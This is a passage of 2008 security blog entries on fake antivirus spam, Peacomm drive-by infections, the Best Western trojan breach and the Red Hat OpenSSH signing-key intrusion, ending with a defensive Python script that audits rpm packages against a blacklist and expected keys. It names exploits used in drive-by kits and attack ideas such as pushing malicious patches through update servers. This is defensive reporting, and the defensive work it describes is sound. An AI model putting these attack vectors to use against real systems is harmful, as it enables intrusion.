Perhaps it’s because this is also the time of the year when the more legitimate security suites are releasing their latest software updates, and cyber criminals are riding on this season to ramp up their profits. Bad news for the infected users, though, as their latest versions of “antivirus software” are actually adding more threats to their system.

Trend Micro is still investigating this spam run. Updates will be posted when more information becomes available.



The Peacomm network has definitely turned out to be a survivor. With infections dating back to January 2007 and a P2P structure largely unchanged in about a year, Peacomm continues to evolve and infect new hosts. In early August our honeypots began capturing a new version of Peacomm. This iteration has been relatively low key as it propagates via users visiting infected Web sites, rather than by spam. Although Peacomm has been distributed via infected Web sites in the past, they were usually Web sites that were spammed to users as opposed to relying on drive-by downloading to gather its new recruits.

The attack toolkit used to install Peacomm in these drive-by attacks has changed as well. The infection begins with a user visiting an infectious Web site, which silently redirects the user to hostile content on a set of registered domains via an IFRAME. At this point, Kallisto TDS will serve a set of exploits against the victim. These include Acrobat PDF CollectEmailInfo, ANI Header Size, and MDAC.

Symantec IPS (NIS, NAV, N360, SEP, and SCS) will detect these attacks as follows with existing signatures:

HTTP ANI File Hdr Size BO

HTTP Malicious Toolkit Download Activity

HTTP MS Unsafe ActiveX Obj Instantiation

If a system were to become infected, the Peacomm P2P traffic would be detected as BD Peacomm Trojan, and the bot itself would be detected by antivirus as Trojan.Peacomm.
Message Edited by SR Blog Moderator on 08-14-2008 04:16 PM

Thoughts on the Best Western Compromise

Published: 2008-08-25,
Last Updated: 2008-08-25 16:51:18 UTC
by John Bambenek (Version: 1)

0 comment(s)

The Sunday Herald reported on Sunday that Best Western was struck by a trojan attack that led to the possible compromise of about 8 million victims. There is some debate as to the extent of the breach and not a small amount of rumor going around. I'm not entirely disposed to trust corporate press releases for the facts, nor am I going to blindly accept claims of security researchers whose first call is to the PR team when discovering a problem.

That said, here is what seems to be the agreed upon facts:

- A trojan was installed on one of the machines in Best Western's booking systems, which led to a compromise of credentials for the hotel's staff. Attempts were made (probably successfully) to sell these credentials to organizations with links to the Russian mafia.

- Best Western is and was PCI DSS compliant.

Of course, PCI really only helps one piece of the security equation and compliance is not the same as security. In fact, it is usually (at best) a poor substitute and more often an excuse to stop thinking about security ("We're Compliant!" followed by self-congratulatory back slapping). The same is true with relying on encryption. Encryption can be "defeated" and the ways to do it are well-known. (For instance, here is a paper I wrote almost 4 years ago on how to do it). If you can own the endpoint of a communication, encryption is irrelevant.

As another example, remember the backup tape heists a few years ago? Attackers know it takes an excessive amount of time to crack encryption, so they target ways to avoid it. Someone had the great idea of stealing backup tapes at which point few people would have even thought to have protected those. Now it's due diligence.

That said, here are 5 areas that are likely targets in the near future (or are targets now) that you may be overlooking:

- Centralized patching systems (e.g., WSUS). If you can hijack an update server and have it distribute a malicious patch, you own every desktop in an environment. The RedHat compromise should be a wake-up call in this regard.

- Centralized configuration and management systems (e.g., Configuresoft or the like). Same as above... the machine that controls all your desktops becomes the single point of pwnership.

- Payroll. Your payroll system has salary information and identification information. In short, it has everything you need to commit tax fraud. In the US, in particular, it also has your national identification number (what is falsely called a "Social Security Number") which allows an attacker to basically jack your entire identity as well.

- Web 2.0. There have been some attempts to spread malware or spear phish using Web 2.0 technology. In as far as your organization uses Web 2.0, the more "legitimate" a message looks, the more likely a user is to click it. Web 2.0 provides a great vector to compromise an organization, especially if many of your employees use it. (Think social engineering).

- Malicious insiders. Ok, this last one is not new, but still a solid majority of attacks have at least some component of an insider attack. In some cases, simply installing a keylogger and "selling" the result is simple enough for a disgruntled employee with even a token level of access to an environment.

Will put up more info on Best Western as the situation warrants. Thoughts on the top 5 list? What would you add or take off?

--
John Bambenek
bambenek /at/ gmail \dot\ com

Keywords: best western compromise data loss

Published: 2008-08-22,
Last Updated: 2008-08-22 15:45:39 UTC
by Patrick Nolan (Version: 2)
0 comment(s)

Critical: openssh security update

"Last week Red Hat detected an intrusion on certain of its computer systems and took immediate action". "In connection with the incident, the intruder was able to sign a small number of OpenSSH packages relating only to Red Hat Enterprise Linux 4  (i386 and x86_64 architectures only) and Red Hat Enterprise Linux 5 (x86_64 architecture only)".

"processes and efforts to date indicate that packages obtained by Red Hat Enterprise Linux subscribers via Red Hat Network are not at risk".

Affected Products: Red Hat Desktop (v. 4)
Red Hat Enterprise Linux (v. 5 server)
Red Hat Enterprise Linux AS (v. 4)
Red Hat Enterprise Linux AS (v. 4.5.z)
Red Hat Enterprise Linux Desktop (v. 5 client)
Red Hat Enterprise Linux ES (v. 4)
Red Hat Enterprise Linux ES (v. 4.5.z)
Red Hat Enterprise Linux WS (v. 4)

CVEs (cve.mitre.org): CVE-2007-4752

Update - RedHat OpenSSH blacklist script released

RedHat has released "shell script which lists the affected packages and can verify that none of them are installed on a system".
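The intruder signed the tampered packages with Red Hat's own key, so a signature check alone will not find them; the check has to combine package identity (a blacklist of the affected NVRAs) with signature provenance (unsigned packages, or packages signed by a key you do not expect). The following Python example, added here and not Red Hat's script, parses the output of rpm -qa --qf '%{NAME}-%{VERSION}-%{RELEASE}.%{ARCH}\t%{SIGPGP:pgpsig}\n' and reports blacklisted, unsigned and unexpectedly signed packages. The rpm output, the blacklist entries and the second key ID are constructed placeholders, not the packages named in the advisory; the expected key ID must be confirmed against rpm -q gpg-pubkey on your own systems.

```python
import re

KEY_ID_RE = re.compile(r"Key ID ([0-9a-fA-F]{16})")


def parse_rpm_listing(text):
    r"""Parse lines of 'NVRA<TAB>signature' as printed by
    rpm -qa --qf '%{NAME}-%{VERSION}-%{RELEASE}.%{ARCH}\t%{SIGPGP:pgpsig}\n'
    into (nvra, key_id_or_None) tuples. A signature of '(none)' means unsigned."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        nvra, _, sig = line.partition("\t")
        m = KEY_ID_RE.search(sig)
        rows.append((nvra.strip(), m.group(1).lower() if m else None))
    return rows


def audit_packages(rows, blacklist, expected_key_ids, name_filter=("openssh",)):
    """Flag packages that are blacklisted, unsigned, or signed by an unexpected key.

    Every package is checked against the blacklist; only packages whose name
    starts with one of name_filter have their signature provenance checked,
    which keeps the report focused on the component named in the advisory."""
    expected = {k.lower() for k in expected_key_ids}
    findings = []
    for nvra, key in rows:
        if nvra in blacklist:
            findings.append((nvra, "BLACKLISTED: known tampered package"))
        if not nvra.startswith(name_filter):
            continue
        if key is None:
            findings.append((nvra, "unsigned"))
        elif key not in expected:
            findings.append((nvra, f"signed by unexpected key {key}"))
    return findings


# Constructed rpm output for illustration only. The NVRAs, dates and the key
# 0123456789abcdef are placeholders; the bash line shows a package outside the
# name filter that is still compared against the blacklist.
CONSTRUCTED_RPM_OUTPUT = (
    "openssh-4.3p2-99.el5.x86_64\tDSA/SHA1, Thu 21 Aug 2008 10:00:00 AM UTC, Key ID 5326810137017186\n"
    "openssh-server-4.3p2-99.el5.x86_64\tDSA/SHA1, Thu 21 Aug 2008 10:00:00 AM UTC, Key ID 5326810137017186\n"
    "openssh-clients-4.3p2-98.el5.x86_64\t(none)\n"
    "openssh-askpass-4.3p2-98.el5.x86_64\tDSA/SHA1, Mon 04 Aug 2008 09:00:00 AM UTC, Key ID 0123456789abcdef\n"
    "bash-3.2-21.el5.x86_64\tDSA/SHA1, Mon 04 Aug 2008 09:00:00 AM UTC, Key ID 5326810137017186\n"
)

# Assumption: the release key you trust for this system. Confirm locally with
# rpm -q gpg-pubkey --qf '%{NAME}-%{VERSION}-%{RELEASE} %{SUMMARY}\n' before relying on it.
EXPECTED_KEYS = {"5326810137017186"}

# Hypothetical blacklist in the shape a vendor advisory would supply it.
BLACKLIST = {
    "openssh-4.3p2-99.el5.x86_64",
    "openssh-server-4.3p2-99.el5.x86_64",
}

if __name__ == "__main__":
    rows = parse_rpm_listing(CONSTRUCTED_RPM_OUTPUT)
    for nvra, problem in audit_packages(rows, BLACKLIST, EXPECTED_KEYS):
        print(f"{nvra}: {problem}")
```

On a real host, pipe the rpm query into the parser instead of the constructed string, and also run rpm -V openssh-server to catch modified files in an otherwise correctly named and signed package. The point of keeping the blacklist separate from the key check is that the two fail in different ways: the blacklist catches the packages the intruder signed with a genuine key, while the provenance check catches anything installed from an unofficial source later.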
